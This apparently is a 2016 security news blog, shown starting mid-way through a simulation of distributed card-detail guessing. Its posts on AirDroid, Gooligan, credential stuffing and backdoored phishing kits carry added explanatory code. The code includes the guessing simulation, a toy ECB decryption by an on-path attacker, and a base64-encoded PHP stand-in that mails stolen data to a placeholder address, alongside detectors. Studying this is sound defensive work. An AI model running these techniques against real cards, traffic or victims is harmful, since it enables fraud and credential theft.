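    usable = [m for m in merchants if m.checks == set(known) | {field}]
    attempts, i = 0, 0
    for candidate in space:
        result = None
        while result is None:
            if not usable or issuer.blocked:
                return None, attempts
            m = usable[i % len(usable)]
            i += 1
            result = m.try_payment({**known, field: candidate})
            if result is None:
                usable.remove(m)     # exhausted its per-card limit, rotate on
        attempts += 1
        if result:
            return candidate, attempts
    return None, attempts


def run_attack(card=None, centralized_limit=None, per_card_limit=10, n_merchants=400, seed=1):
    rng = random.Random(seed)
    expiry, cvv = card or (rng.choice(EXPIRY_SPACE), rng.choice(CVV_SPACE))
    issuer = Issuer(expiry, cvv, centralized_limit)
    # Constructed mix: a quarter of sites check only expiry, the rest expiry + CVV.
    merchants = [Merchant(f"shop{n}", {"expiry"} if n % 4 == 0 else {"expiry", "cvv"},
                          per_card_limit, issuer) for n in range(n_merchants)]
    got_expiry, a1 = guess_field(merchants, issuer, "expiry", EXPIRY_SPACE, {})
    if got_expiry is None:
        return {"expiry": None, "cvv": None, "attempts": a1, "blocked": issuer.blocked}
    got_cvv, a2 = guess_field(merchants, issuer, "cvv", CVV_SPACE, {"expiry": got_expiry})
    return {"expiry": got_expiry, "cvv": got_cvv, "attempts": a1 + a2, "blocked": issuer.blocked}


if __name__ == "__main__":
    print("per-merchant limits only:", run_attack())
    print("centralized limit of 10: ", run_attack(centralized_limit=10))
    print("single merchant:         ", run_attack(n_merchants=1))
```

With only per-merchant limits, each of the 400 sites sees at most a handful of attempts on the card, well under its own threshold, while the issuer never sees the aggregate; the same run with a centralized limit blocks the card before the expiry date is even found.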

Tuesday, 6 December 2016

Millions of Android Users at Risk of MitM (Man-in-the-Middle) Attacks

The news has potential implications for users around the world, since AirDroid has an estimated user base of between 10 and 50 million devices, according to the Google Play Store. IT managers should see the news of a potential MitM attack as another reason to check the relevance of their security policies and mobile strategies.

Android Users at Risk

AirDroid sends the device authentication information to its statistics server over an insecure channel, encrypting it with the Data Encryption Standard (DES) in Electronic Codebook (ECB) mode, researcher Simone Margaritelli explained on the Zimperium blog. The problem is that the encryption key is hardcoded into the app, so anyone who unpacks it holds the key. An attacker on the same network as the device could therefore launch a MitM attack to decrypt and steal the authentication data and impersonate the victim in future requests.
A MitM attack is one in which an attacker secretly relays, and possibly alters, the traffic between two parties. In this case, Margaritelli explained, an attacker could alter the response to the /phone/vncupgrade request, which the app uses to check for updates, and so control what the app fetches as an update.

Don’t Snooze on MitM Attacks

The news will be of interest to IT and security managers in organizations that are evaluating the relative strengths of different mobile operating systems and devices, such as smartphones running Android and Apple devices running iOS.
According to InfoWorld, iPhones account for roughly 70 to 90 percent of devices used in the enterprise. Executive editor Galen Gruman advised businesses to hold back on Android due to security concerns, lack of application choices and the diffuse nature of the operating system.
However, more organizations are allowing workers to embrace bring-your-own-device (BYOD) or choose-your-own-device (CYOD) policies, ZDNet reported. To properly serve all employee types, enterprise mobility leaders must support both BYOD and CYOD and include corporate-owned, privately enabled elements.

MitM Mitigation

Margaritelli advised AirDroid’s developers to use HTTPS channels exclusively, to verify the remote server’s public key, and to digitally sign updates and verify the signature before installing them. Additionally, the app should adopt a proper key exchange mechanism instead of relying on encryption keys hardcoded within it.
After Margaritelli first alerted the vendor in May and followed up repeatedly, the company issued updated versions 4.0.0 and 4.0.1, but neither fixed the issue. Margaritelli advised AirDroid users to uninstall the app until the vendor issues a fix.
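The combination of a key embedded in the APK and ECB mode is worth seeing on the wire. The following is an added example, not AirDroid's code and not DES: it uses a deliberately tiny toy block cipher (8-byte blocks, a fixed S-box, four rounds) so that ECB behaviour can be shown without a crypto library. The captured record and APP_KEY are constructed. Two things fall out: identical plaintext blocks produce identical ciphertext blocks, visible to anyone on the network without the key, and anyone who has unpacked the app holds the key and decrypts the authentication record outright, which is what the MitM needs to impersonate the device.

```python
"""Why a hard-coded key in ECB mode leaks everything to an on-path attacker.

Added example; not AirDroid's code and not DES. The block cipher is a toy
(8-byte blocks, a fixed S-box, four rounds) used only so that ECB-mode
behaviour can be shown without a crypto library; it is not secure. The
captured RECORD and APP_KEY are constructed.
"""
import random

BLOCK = 8
_rng = random.Random(0)
SBOX = list(range(256))
_rng.shuffle(SBOX)                 # fixed byte permutation
INV_SBOX = [0] * 256
for i, v in enumerate(SBOX):
    INV_SBOX[v] = i

APP_KEY = b"hardcode"   # constructed: stands in for the key embedded in the app binary


def _enc_block(block, key):
    state = bytearray(block)
    for _ in range(4):
        state = bytearray(SBOX[b ^ k] for b, k in zip(state, key))
        state = state[1:] + state[:1]           # rotate bytes left
    return bytes(state)


def _dec_block(block, key):
    state = bytearray(block)
    for _ in range(4):
        state = state[-1:] + state[:-1]         # undo the rotation
        state = bytearray(INV_SBOX[b] ^ k for b, k in zip(state, key))
    return bytes(state)


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    return data[:-data[-1]]


def ecb_encrypt(data, key):
    """ECB: every block is encrypted independently with the same key."""
    data = pad(data)
    return b"".join(_enc_block(data[i:i + BLOCK], key) for i in range(0, len(data), BLOCK))


def ecb_decrypt(data, key):
    return unpad(b"".join(_dec_block(data[i:i + BLOCK], key) for i in range(0, len(data), BLOCK)))


def repeated_blocks(ct):
    """Indices of ciphertext blocks that occur more than once: a pattern oracle
    for anyone watching the wire, no key needed."""
    seen = {}
    for i in range(0, len(ct), BLOCK):
        seen.setdefault(ct[i:i + BLOCK], []).append(i // BLOCK)
    return [idx for idx in seen.values() if len(idx) > 1]


# Constructed device-to-server record built from 8-byte fields; fixed-width
# protocol fields are what make the ECB repetition visible.
RECORD = b"id=00001" + b"A" * 16 + b"dev=andr" + b"A" * 16


def on_path_attacker(captured_ciphertext, key_from_apk):
    """Anyone on the same network who has pulled the key out of the APK
    recovers the authentication record and can replay it as the device."""
    return ecb_decrypt(captured_ciphertext, key_from_apk)


if __name__ == "__main__":
    ct = ecb_encrypt(RECORD, APP_KEY)
    print("repeated ciphertext blocks (no key needed):", repeated_blocks(ct))
    print("decrypted with the key from the APK:", on_path_attacker(ct, APP_KEY))
```

Switching the mode to CBC would hide the repetition but not the real flaw: as long as the key ships in the app, the second function works for every attacker. That is why the advice above is HTTPS with a verified server key and signed updates rather than a different symmetric mode.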

Monday, 5 December 2016

Android malware steals access to more than one million Google accounts

A new Android malware has managed to steal access to more than 1 million Google accounts, and it continues to infect new devices, according to security firm Check Point. “We believe that it is the largest Google account breach to date,” the security firm said in a blog post.

The malware, called Gooligan, has been preying on devices running older versions of Android, from 4.1 to 5.1, which are still used widely, especially in Asia.

Gooligan masquerades as legitimate-looking Android apps. Check Point has found 86 titles, many of which are offered on third-party app stores, that contain the malicious code.

Once Gooligan is installed, it attempts to root the device, as a way to gain full control. The malware does this by exploiting well-known vulnerabilities in older versions of Android.

“These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user,” Check Point said.

Saturday, 3 December 2016

UK National Lottery Accounts Breached

Camelot, the company that runs the UK National Lottery, announced today that approximately 26,500 customer accounts had been fraudulently accessed. The activity was discovered on Monday.

Camelot claims that "there has been no unauthorized access to core National Lottery systems or any of our databases;" that is, it has not been hacked. Instead it suggests that the attackers used emails and passwords stolen from another online service.

Camelot is also confident that the affected customers cannot directly lose financially from the activity, although some personal information will have been accessed. It adds, "We have taken the measure of suspending the accounts of these players and are in the process of contacting them to help them re-activate their accounts securely." This will undoubtedly lead to increased phishing activity as criminals pretend to be Camelot offering help while actually soliciting further personal information.

The incident demonstrates the need for a responsible partnership between online organizations and users. Both have their part to play. Organizations should require two-factor authentication (and there are now several frictionless biometric options available), while customers should never reuse passwords for any account that holds personal or financial details.

In both this and the recent Tesco Bank incident it seems as if the attackers timed their activity over a weekend. A similar number of accounts were affected, and in both cases credentials stolen elsewhere were used. The possibility that attackers are automating the extraction of customer details from large stolen databases should not be ignored. If this is the case, then it is not just affected Camelot customers that should change their passwords, but anyone who has reused passwords for more than one account. Needless to say, if a two-factor authentication option is available, it should be adopted.

"There's no doubt that when one database is breached, it's common for the credentials stolen to be tried elsewhere," comments ESET senior research fellow David Harley. "If you were a bad guy, why wouldn’t you try them elsewhere? It can be done manually, of course, but it doesn’t require a lot of effort to automate, either. Which is why I (and many other security commentators) routinely recommend that people don't re-use credentials, at any rate for sites that use and may retain significant data."

The danger, however, is whether these bad guys are able to find common third-party services among the millions of email addresses and passwords at their disposal; that is, if they can find a way of locating Tesco Bank customers, or Camelot customers within the databases. This would not be impossible. Among the stolen credentials there will be many that provide access to the users' actual email accounts.
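Credential stuffing of the kind described here has a recognisable shape in a login log: one source trying many distinct accounts in a short window, failing on most and succeeding on the few whose owners reused a password. The script below is an added example, not Camelot's detection. It slides a time window per source address over constructed log lines in a simple "timestamp ip username result" form and reports the accounts that succeeded inside a flagged window, which are the ones to suspend and reset. The thresholds are assumptions to tune per site.

```python
"""Spot credential stuffing in a web login log: many distinct accounts tried
from one source with a high failure rate inside a short window.

Added example, not Camelot's detection. The log lines are constructed in a
simple 'timestamp ip username result' shape; real logs need their own parser.
The thresholds are assumptions to tune per site.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log: one stuffing run early on a Sunday, one user fumbling a
# password, and one ordinary login.
LOG = """\
2016-11-27T02:00:01Z 203.0.113.5 alice@example.net FAIL
2016-11-27T02:00:02Z 203.0.113.5 bob@example.net FAIL
2016-11-27T02:00:02Z 203.0.113.5 carol@example.net OK
2016-11-27T02:00:03Z 203.0.113.5 dave@example.net FAIL
2016-11-27T02:00:03Z 203.0.113.5 erin@example.net FAIL
2016-11-27T02:00:04Z 203.0.113.5 frank@example.net OK
2016-11-27T02:00:05Z 203.0.113.5 grace@example.net FAIL
2016-11-27T02:00:05Z 203.0.113.5 heidi@example.net FAIL
2016-11-27T02:00:06Z 203.0.113.5 ivan@example.net FAIL
2016-11-27T02:00:07Z 203.0.113.5 judy@example.net FAIL
2016-11-27T09:15:10Z 198.51.100.20 alice@example.net FAIL
2016-11-27T09:15:30Z 198.51.100.20 alice@example.net FAIL
2016-11-27T09:16:02Z 198.51.100.20 alice@example.net OK
2016-11-27T10:00:00Z 192.0.2.77 mallory@example.net OK
"""

WINDOW = timedelta(minutes=10)
MIN_DISTINCT_USERS = 8      # assumption: a legitimate client rarely tries this many accounts
MIN_FAIL_RATIO = 0.6        # assumption: stuffing fails on most accounts it tries


def parse(log):
    for line in log.splitlines():
        ts, ip, user, result = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result == "OK"


def detect(log=LOG, window=WINDOW, min_users=MIN_DISTINCT_USERS, min_fail=MIN_FAIL_RATIO):
    """Slide a time window per source IP and flag it when the window touches
    many distinct accounts with mostly failures. Returns
    {ip: {"users": n, "fail_ratio": r, "compromised": [accounts that succeeded]}}."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in parse(log):
        by_ip[ip].append((ts, user, ok))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            users = {u for _, u, _ in span}
            fails = sum(1 for _, _, ok in span if not ok)
            ratio = fails / len(span)
            if len(users) >= min_users and ratio >= min_fail:
                flagged[ip] = {           # keep the widest qualifying window
                    "users": len(users),
                    "fail_ratio": round(ratio, 2),
                    "compromised": sorted({u for _, u, ok in span if ok}),
                }
    return flagged


if __name__ == "__main__":
    for ip, info in detect().items():
        print(f"{ip}: {info['users']} accounts, {info['fail_ratio']:.0%} failures, "
              f"suspend and reset: {', '.join(info['compromised'])}")
```

The repeated failures from 198.51.100.20 are one user mistyping one password and are correctly left alone; the distinguishing signal is the number of distinct accounts per source, not the failure count by itself.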

Friday, 25 November 2016

Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.
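The hardcoded-address and encoded-include tricks described above are what an incident responder looks for when a kit like this turns up on a compromised web host: the visible mail() recipient is rarely the only one. Below is an added example, not Proofpoint's code and not taken from any real kit: a small Python triage script run over a constructed two-file stand-in (placeholder file names and example.com/example.net addresses only) that lists every mail() recipient, including one hidden behind base64-encoded PHP in a file named like a stylesheet, and flags includes of non-PHP-named files that nevertheless carry PHP code.

```python
import base64
import re

# Constructed stand-in for a backdoored kit (placeholder names and addresses
# only; not a real kit). It mirrors the layout Proofpoint describes: a visible
# mail() call for the buyer, plus an include of "style.js" that is really
# base64-encoded PHP mailing a second, hidden recipient.
HIDDEN_PHP = b'mail("kit-author@example.net", "Result", $data);'
KIT_FILES = {
    "login.php": (
        "<?php\n"
        '$data = "<form fields collected by the kit>";\n'
        'include("style.js");\n'
        'mail("kit-buyer@example.com", "Result", $data);\n'
        "?>"
    ),
    "style.js": '<?php eval(base64_decode("'
                + base64.b64encode(HIDDEN_PHP).decode()
                + '")); ?>',
}

# Recipient argument of mail(), the target of include/require, and the literal
# handed to base64_decode(). Real kits vary; these cover the common shapes.
MAIL_RE = re.compile(r'\bmail\s*\(\s*["\']([^"\']+)["\']')
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*["\']([^"\']+)["\']')
B64_RE = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']')


def decode_layers(src, depth=3):
    """Yield src itself, then every base64 payload it carries, recursively
    (bounded), so a mail() nested inside eval(base64_decode(...)) is seen."""
    yield src
    if depth == 0:
        return
    for blob in B64_RE.findall(src):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        yield from decode_layers(inner, depth - 1)


def analyze_kit(files):
    """Return every mail() recipient with where it was found, plus any include
    of a file whose name is not PHP-like but whose content contains PHP tags."""
    recipients = {}
    suspicious_includes = []
    for name, src in files.items():
        for inc in INCLUDE_RE.findall(src):
            target = files.get(inc, "")
            if not inc.lower().endswith((".php", ".inc")) and "<?php" in target:
                suspicious_includes.append((name, inc))
        for layer_no, layer in enumerate(decode_layers(src)):
            where = name if layer_no == 0 else name + " (base64-encoded)"
            for addr in MAIL_RE.findall(layer):
                places = recipients.setdefault(addr, [])
                if where not in places:
                    places.append(where)
    return {"recipients": recipients, "suspicious_includes": suspicious_includes}


def hidden_recipients(report):
    """Addresses that appear only inside encoded payloads: the author's
    backdoor, as opposed to the address the buyer configured in plain sight."""
    return sorted(addr for addr, places in report["recipients"].items()
                  if all("(base64-encoded)" in p for p in places))


if __name__ == "__main__":
    report = analyze_kit(KIT_FILES)
    for addr, places in report["recipients"].items():
        print(f"{addr}: {', '.join(places)}")
    print("hidden recipients:", hidden_recipients(report))
    print("suspicious includes:", report["suspicious_includes"])
```

Every address the script surfaces is an indicator to block at the outbound mail gateway and to report; the hidden ones also tell the responder that victims' credentials went to at least two parties, which changes the notification the affected users should receive.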

Tuesday, 22 November 2016

Facebook built censorship tool to get into China despite human rights risks

Facebook wants to be unbanned in China, so it’s built a censorship tool that could hide posts about prohibited topics from people in China, according to The New York Times‘ Mike Isaac. Rather than censor posts itself, Facebook would potentially provide the tool to a third-party in China such as a local partner company that could use it to prevent users in China from seeing content that breaks the government’s rules.
While China could unlock huge amounts of users and ad revenue for Facebook, the censorship tool could also be used to enact human rights abuse. If China could track which local users are trying to protest or bad-mouth the government, they could face persecution.
Perhaps that’s why The New York Times says several Facebook staffers who worked on the product have left the company. So far, there are no signs that Facebook has offered the tool to Chinese authorities. We don’t have details on the specifics of how it would work. It’s apparently only one of several ideas Facebook has explored for getting access to China, and they might never be launched.
But the existence of the tool brings up strong concerns about what’s best and safest for Chinese citizens.
Mark Zuckerberg has held in the past that some Facebook access could benefit them. The New York Times reports that at an internal Q&A about its intentions in China, Zuckerberg said, “It’s better for Facebook to be a part of enabling conversation, even if it’s not yet the full conversation.”
That mirrors Facebook’s stance about internet access, where it’s pushed the idea that limited free access to the web is better than none at all for those who can’t afford it. Facebook already allows Chinese companies to buy ads that run in places where it isn’t banned.
In a statement to TechCrunch, a Facebook spokesperson wrote: “We have long said that we are interested in China, and are spending time understanding and learning more about the country. However, we have not made any decision on our approach to China. Our focus right now is on helping Chinese businesses and developers expand to new markets outside China by using our ad platform.”
Over time, the interpersonal connection via Facebook could strengthen communities who might be able to organize and protest the government outside of the app. Yet the censorship tool’s potential to be used to round up dissidents looms over any long-term benefit for citizens, or profit for Facebook.

Trump Mentions Cyber in 100-Day Plan

In a Monday evening video message, Donald Trump discussed how he intends to address trade, energy, regulation, national security, immigration and ethics-related issues during the first 100 days of his presidency—and he also addressed cybersecurity, very briefly.
Characterizing his agenda as "putting America first," the president-elect said that cyber-attacks from foreign governments and non-state terrorist actors is "one of our most critical national security concerns.”
Details were few, but the Republican pledged to create a Cyber Review Team to provide safeguarding recommendations and establish protocols and awareness training for government employees. He also said that he would direct the Department of Defense and the chairman of the Joint Chiefs of Staff to develop a comprehensive plan to protect the United States' infrastructure from cyber-attacks, as well as all other forms of attacks, during his first 100 days in office.
Rick Hanson, the executive vice president at Skyport Systems, said via email that “It’s not enough for a president to ask the DoD and JCS to develop a comprehensive cyber-plan, that has nothing new. We as a country need a clear focus from the top of the food chain down. A cabinet position that focuses on cyber as well as a strong focus and knowledge of the implications by the president himself. We can no longer rely on other agencies to build a plan."
Lastly Hanson added, "A plan must be built and executed by those who have an intimate knowledge of cyber-infrastructure and the threat landscape that not only exists but is possible. The sooner we secure our infrastructure from the core, the more efficient we will be in maintaining the security of our cyber-infrastructure. Regulations and guidelines must exist that define what our core infrastructure looks like from the bare metal. Security at the hardware level is essential for a truly secure infrastructure."

Monday, 21 November 2016

Twitter Celebs and Corporate Accounts Hacked Through Third Party

A third party Twitter site was hacked over the weekend and various celebrity and media accounts taken over to promote an “increase Twitter followers” service.
Twitter Counter, which claims to be the ‘#1 stat site powered by Twitter’ posted the following on Saturday:
“We can confirm that our service has been hacked; allowing posts on behalf of our users! We have launched an investigation into this matter.”
Earlier, countless celebrity accounts including those of Charlie Sheen and Lionel Messi, as well as the likes of Sky News, The New Yorker, The Next Web, and The Economist posted tweets on behalf of a site claiming to increase users’ Twitter followers.
Even the Twitter accounts of the US National Transportation Safety Board (NTSB), Playstation and Xbox were compromised.
Twitter Counter subsequently confirmed that it had addressed the problem and hackers can’t post on its users’ behalf any more.
It’s unclear exactly how the cyber attack on the firm occurred, but it has been quick to reassure customers with the following update:
“We ensure the privacy of our users' information. We do not store credit card information and we do not keep Twitter account passwords.”
Although the hackers appear to have focused their efforts on taking over high profile accounts with many followers, regular users would probably still do well to change their passwords and switch on two-factor authentication.
The incident is also a reminder of the potential security risk of linking one’s social accounts to third party services like Twitter Counter, as they can provide another way for hackers to attack.
In September, Twitter joined a new industry coalition designed to improve cybersecurity standards.
The Vendor Security Alliance (VSA) will help businesses assess how secure the companies they’re looking to partner with are to ensure there are no weak links in the chain.

FBI: US ATMs Could Be Hacked to Spew Cash

The FBI is warning that potential ATM attacks, similar to those in Taiwan and Thailand that caused ATMs to dispense millions, could happen in the US.
The FBI said in a recent bulletin that it was “monitoring emerging reports indicating that well-resourced and organized malicious cyber-actors have intentions to target the US financial sector.” Now, the Wall Street Journal has reported that the threat could be linked to malicious software used by the Russian gang known as Buhtrap, known for stealing money through fraudulent wire transfers. Sources said that the group has been testing ATM hacking techniques on Russian banks, and will soon look to try them out on financial institutions in other countries.
The first such attack on an ATM system was reported in the Taiwanese capital Taipei in July, after 22 thieves made off with $2.6 million from ATMs around the country by causing them to spit out cash. Criminals from eastern Europe and Russia are said by police to have used malware to infiltrate cash machines run by First Commercial Bank. Three suspects were eventually arrested in Taipei and north-east Taiwan, with around half the money recovered.
A similar attack was reported at the Government Savings Bank in Thailand the following month. There, the Ripper malware was used in a sophisticated campaign to steal 12 million baht (£265,400) from ATMs in Thailand. Ripper targets three major global ATM manufacturers, and is unusual in that it interacts with the targeted machine via a specially crafted bank card featuring an EMV chip which acts as an authentication method.

Sunday, 20 November 2016

China adopts tough law on cyber-security

China today adopted a tough cybersecurity law which it said was aimed at safeguarding sovereignty on cyber space and national security, and to deal with related risks at home and abroad.
The new law was passed by China's legislature, the National 
According to the new law, the government will take measures to "monitor, defend and handle cybersecurity risks and threats originating from within the country or overseas sources, protecting key information infrastructure from attack, intrusion, disturbance and damage".
Efforts will also be made to punish criminal activities online and safeguard the order and security of cyberspace, state-run Xinhua news agency reported.
Under the new law, individual users and organisations are not allowed to jeopardise security on the Internet or use it to "damage national security, honour and interests".
Online activities that are attempts to overthrow the socialist system, split the nation, undermine national unity, advocate terrorism and extremism are all prohibited, according to the provisions, which also forbade activities including inciting ethnic hatred, discrimination and spreading violence and obscene information online.
The law was passed at the bimonthly session of the NPC Standing Committee, which concluded today, after a third reading.
China administers its internet with massive firewalls to protect it from outside interventions.
It has also effectively banned social media outlets like Facebook and Twitter, and controls local social media sites like Weibo through firewalls that block any content deemed harmful to the ruling Communist Party of China and the government.

Now Facebook users can automatically launch ''Safety Check''

Facebook will now allow its 1.2 billion users to automatically launch its crisis response tool, "Safety Check".

According to a report by on Thursday, this change will allow the community to decide the urgency of the nearby danger, something Facebook has struggled to grasp.

In areas of immediate danger, Safety Check allows people to notify their family and friends that they are safe. The feature has been used during natural calamities and terrorist attacks across the world.

"When Facebook had control of Safety Check, it had a high standard of what counted as a disaster. A typhoon in the Philippines might have six inches of water in your house, and in California, that'd be a big deal. But in the Philippines, we did research there, and people said this wasn't a big deal," the report quoted Peter Cottle, Facebook's lead engineer on crisis response, as saying.

"In the past two years, Facebook turned on Safety Check 39 times. Compare that to 335 dangerous events flagged by its community-based Safety Check tool since the company began testing it in June. One of the first instances of a community-generated Safety Check was the Orlando nightclub shooting in June," the report said. 

Facebook considers an event as not being an emergency if the users ignore the Safety Check, which then fades itself. 

"We can tell how many people are spreading this and marking themselves safe, and how quickly it's growing. There's a real strong measure of urgency based on the rapidness of the people who are using the tool," Cottle said.

However, Facebook has been criticised for being selective when it comes to launching the Safety Check tool during a crisis.

In November 2015, Facebook CEO Mark Zuckerberg responded with a Facebook post saying, "We care about all people equally, and we will work hard to help people suffering in as many of these situations as we can."

Reports said that Facebook was also testing out a Community Help page that "users can access after checking in as safe. There, users can post if they need shelter, food or supplies, or if they can provide any of those resources". 

The Community Help feature is expected to be available by January 2017.

Saturday, 19 November 2016

If You Use an iPhone, Call Logs Are Quietly Synced to iCloud, Forensics Firm Warns

A log of all phone calls made from iPhone devices running iOS 8 or newer may be automatically synchronized to iCloud and susceptible to third-party access, digital forensics and IT security solutions provider Elcomsoft has warned.

The issue, Elcomsoft’s Oleg Afonin explains, is not only that call records are synced to iCloud (when iCloud is enabled) regardless of whether the user wants that to happen or not, but also that iCloud data is loosely protected. Thus, if a user’s calls are synced to the cloud, Apple itself and third parties with access to the proper credentials could extract them.
What’s more, all of the information stored in iCloud is available for law enforcement upon request, unlike data stored exclusively on the device, which Apple has said numerous times it cannot access.
In fact, Apple entered a spat with the FBI earlier this year when it refused to help decrypt the iPhone of San Bernardino shooter Syed Rizwan Farook, claiming that the Bureau was actually requesting a backdoor to be included in all iPhone devices. Eventually, the FBI received help from a third-party firm, but the quarrel went viral as large tech companies expressed their support for Apple. Some even announced plans to improve their encryption to provide users with increased privacy.

“On devices running iOS 8 and later versions, your personal data is placed under the protection of your passcode. For all devices running iOS 8 and later versions, Apple will not perform iOS data extractions in response to government search warrants because the files to be extracted are protected by an encryption key that is tied to the user’s passcode, which Apple does not possess,” Apple says.
However, the same is not true of data saved in iCloud, because the same level of encryption does not apply to it. In Afonin’s opinion, the cloud syncing functionality is actually a blessing for forensic researchers and law enforcement agencies, as they can access user information that would otherwise be out of reach because of the privacy features in iOS.
“The ability to extract call logs from the cloud instead of having to deal with the tough hardware protection of today’s iPhones can be a blessing for forensic examiners,” Afonin says.

For users, however, this is a privacy nightmare. Not only is access to their data much easier, for Apple and for anyone with the right credentials, but the synced data – in this instance, call logs – is visible on all devices on which the same Apple ID is used.
If a user has two iPhones but a single Apple ID, the calls will appear on both devices. If two people share the same Apple ID, they will have visibility into each other’s calls. What’s more, if one of them clears the calls list on their device, the other user/device will be impacted as well.
The only way to avoid that, Elcomsoft says, is to disable iCloud Drive functionality on the iPhone. The move will not affect features such as iCloud Photo Library or iCloud backups, but will affect the syncing of data for third-party apps that rely on iCloud Drive for that. Increased privacy, it seems, comes at a cost.